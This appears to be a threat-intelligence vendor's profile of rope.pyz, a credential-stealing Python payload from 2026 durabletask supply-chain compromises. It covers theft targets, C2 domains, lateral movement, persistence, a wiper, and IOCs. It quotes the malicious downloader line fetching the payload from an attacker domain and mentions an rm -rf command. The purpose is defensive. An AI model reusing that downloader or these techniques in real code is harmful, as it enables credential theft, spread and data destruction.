rope.pyz
rope.pyz is a Python zipapp second-stage malware payload used in the 2026 supply-chain compromises of the PyPI package durabletask and in related repository-based attacks tied to the broader Shai-Hulud/Miasma campaign. It is described as a direct evolution of the earlier transformers.pyz payload used in the guardrails-ai compromise, and multiple reports link the activity and infrastructure to TeamPCP. The malware targets Linux systems and is designed for cloud workloads, CI/CD runners, Kubernetes environments, and developer infrastructure. In the durabletask compromise, malicious package versions 1.4.1, 1.4.2, and 1.4.3 executed code on import, downloaded rope.pyz from check.git-service.com, saved it as /tmp/managed.pyz, and launched it as a detached python3 process with output suppressed. Related reporting also states that repository-open attacks against Azure/durabletask used a JavaScript loader that fetched rope.pyz from the same infrastructure.
Based on the provided content, rope.pyz is a modular multi-cloud credential theft and intrusion framework containing 17 to 19 modules/files. It steals credentials and secrets from AWS, Azure, GCP, Kubernetes, HashiCorp Vault, local filesystems, shell history, Docker environments, environment variables, and password managers including 1Password, Bitwarden, pass, gopass, and GPG-based stores. It also targets developer and AI tooling artifacts, with references to Claude, Cursor, VS Code, Codeium, Zed, Continue, Kilo, OpenCode, and MCP-related configuration. Cloud-focused collection includes AWS IAM credentials, Secrets Manager and SSM Parameter Store data across 19 regions, Azure service principal and managed identity credentials plus Key Vault secrets, GCP service account credentials and Secret Manager data, Kubernetes kubeconfig files, service account tokens, and secrets across namespaces and contexts. Some reporting also notes GitHub token abuse and fallback exfiltration via attacker-created public repositories under victim accounts.
The malware encrypts stolen data before exfiltration, with reports describing gzip compression, AES-256-GCM encryption, and RSA-OAEP wrapping using a hardcoded RSA-4096 public key. Primary infrastructure includes check.git-service.com, with t.m-kosche.com described as a backup or related C2 domain; one report also associates legacy infrastructure with IP 83.142.209.194. Exfiltration and control paths mentioned in the content include /api/public/version, /v1/models, and /audio.mp3. The malware also uses a GitHub-based dead-drop fallback mechanism by searching commit history for keywords such as FIRESCALE or signed commit messages containing alternate C2 URLs.
rope.pyz includes propagation and persistence capabilities. It can laterally move via AWS Systems Manager by enumerating managed instances and attempting propagation with AWS-RunShellScript or SSM SendCommand, and via Kubernetes by listing pods and using kubectl exec against up to five targets per infected host. Infection markers include ~/.cache/.sys-update-check and ~/.cache/.sys-update-check-k8s. Persistence is described as installation of a fake systemd service named pgsql-monitor.service. Anti-analysis and targeting logic mentioned in the content includes exiting on non-Linux systems, Russian locales, and systems with two or fewer CPUs.
Several reports describe a destructive component, roulette.py, within rope.pyz. Under certain conditions on systems fingerprinted as Israeli or Iranian, and in some descriptions probabilistically, it may play audio fetched from the C2 and execute rm -rf /. High-confidence indicators directly mentioned in the content include check.git-service.com, t.m-kosche.com, /tmp/managed.pyz, /tmp/rope-.pyz, ~/.cache/.sys-update-check, ~/.cache/.sys-update-check-k8s, pgsql-monitor.service, and SHA-256 069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce for rope.pyz.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Aspect May 19 (PyPI Attack) June 5 (Repository Injection) Attack surface PyPI package registry GitHub source repository Trigger import durabletask Opening folder in IDE/AI tool Payload rope.pyz (28 KB, Python) setup.js (4.6 MB, JavaScript)
Techniques & procedures
30 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesOn May 19, 2026, Endor Labs detected three trojanized versions of durabletask, the official Python SDK for Microsoft's Azure Durable Functions. Versions 1.4.1, 1.4.2, and 1.4.3 of durabletask all contain malicious code that runs on import.
The attacker bypassed the repository's CI/CD pipeline entirely and uploaded directly to PyPI using a compromised publishing token.
TeamPCP's self-replicating malware campaign, known as Mini Shai-Hulud, continues to expand in reach with the compromise of durabletask, an official Microsoft Python client... Three malicious package versions have been identified: 1.4.1, 1.4.2, and 1.4.3.
Execution
4 techniquesit uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload... and runs it in the background.
Versions 1.4.1, 1.4.2, and 1.4.3 had a Linux-only downloader appended to the package's __init__.py . Unlike the npm packages, which rely on lifecycle scripts, this payload can execute when Python code imports durabletask .
After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
3 techniquesThe payload domain The second-stage payload is fetched from check.git-service.com. The domain is built to look like routine git tooling traffic in network logs. The file lands at /tmp/managed.pyz with a filename that does not stand out in a directory listing.
Two details in the implementation make this hard to catch at runtime. start_new_session=True detaches the spawned process from its parent. The payload keeps running even after the Python process that triggered the import exits. except: pass catches everything without re-raising.
Credential Access
6 techniquesThe payload attempts brute-force unlock using harvested passwords from environment variables and shell history.
Credential collection Purpose-built collectors target each of the following: AWS: IAM access keys, session tokens... Azure: managed identity tokens... Kubernetes: service account tokens... HashiCorp Vault: VAULT_TOKEN... 1Password: session tokens
Password Managers... harvesting candidate passwords from environment variables... and from shell history entries containing bw unlock or op signin commands... Filesystem... Shell histories: ~/.bash_history, ~/.zsh_history
On AWS, propagation assumes credentials available from the environment or the EC2 instance metadata role.
The malware attempts to extract credentials from: 1Password Bitwarden pass gopass HashiCorp Vault | Targets include: GitHub CLI auth Kubernetes configs Terraform state files Docker configs SSH keys Git credentials VPN configs CI/CD secrets AI developer tooling
The attack planted configuration files that execute a credential-harvesting payload... steals secrets from AWS, Azure, GCP, Kubernetes, and 90+ developer tool configurations.
Discovery
4 techniquesThe payload includes a module called roulette.py, a wiper that runs only on hosts that fingerprint as Israeli or Iranian (timezone/localtime/LANG/locale checks for those regions)
Check CloudTrail for SSM:SendCommand and SSM:DescribeInstanceInformation calls from compromised instances.
The malware attempts to dump: All namespaces All Kubernetes secrets All contexts | It supports: kubectl usage Automatic kubectl download Direct Kubernetes API interaction In-cluster service account auth kubeconfig parsing mTLS API access
The payload includes a module called roulette.py, a wiper that runs only on hosts that fingerprint as Israeli or Iranian (timezone/localtime/LANG/locale checks for those regions)
Lateral Movement
3 techniquesIf it's inside Kubernetes, it propagates through kubectl exec... After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile.
After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile.
The propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com, and runs it in the background.
Command and Control
4 techniquesthe propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com... Also notable is the use of the FIRESCALE mechanism to identify a backup command-and-control (C2) address in the event the primary domain is unreachable.
C2 Domain check.git-service.com ... Backup C2 ... t.m-kosche.com ... Block outbound connections to the exfil endpoints /v1/models , /audio.mp3 , and /api/public/version .
urllib.request.urlretrieve("https://check.git-service.com/rope.pyz", "/tmp/managed.pyz")
If that primary POST fails... the malware falls back to a public dead drop on GitHub. It queries the commit search API with q=FIRESCALE... The first commit message that passes verification becomes the new mothership URL, and the malware retries the identical encrypted POST against that host.
Exfiltration
2 techniquesMay 19 payload connected to the TeamPCP threat group via the secondary C2 domain t.m-kosche[.]com ... Check network logs for connections to check.git-service[.]com and t.m-kosche[.]com .
Collected credentials are sent to attacker-controlled infrastructure... Primary exfiltration... sends a small JSON body... in a single POST... Backup mothership from GitHub commits... GitHub repository fallback... it creates a new public repository... uploads a file named results.json containing the same RSA-wrapped, AES-encrypted package
Impact
1 techniqueThe payload includes a module called roulette.py, a wiper... If the check passes, it runs: rm -rf /* That attempts to delete everything on the filesystem.
IOCs tracked for this family
16 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Python credential-harvesting payload used in the May 19 PyPI attack against durabletask. It stole secrets from developer and cloud environments and required C2 connectivity to check.git-service[.]com.
A Linux-targeting multi-cloud credential-stealing worm embedded in poisoned durabletask releases. It injects itself into multiple package entry points, steals AWS, Azure, GCP, Kubernetes, Vault, password manager, and shell-history secrets, and propagates laterally via AWS SSM and Kubernetes to additional hosts.
A Python zipapp second-stage payload dropped by malicious durabletask versions. It performs environment checks, retrieves C2 via the FIRESCALE GitHub dead-drop, harvests credentials from AWS, Azure, GCP, Kubernetes, Vault, password managers, and AI developer tooling, propagates laterally via AWS SSM and kubectl exec, and supports exfiltration and persistence.
A modular Python zipapp payload delivered via the malicious durabletask==1.4.1 package. It steals AWS, Azure, GCP, Kubernetes, Vault, password manager, GitHub, and developer credentials; dumps secrets; performs encrypted exfiltration; supports selective persistence, AWS/Kubernetes lateral movement, GitHub dead-drop C2 fallback, sandbox evasion, and includes probabilistic destructive wipe logic for certain Israeli and Iranian locale/timezone indicators.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.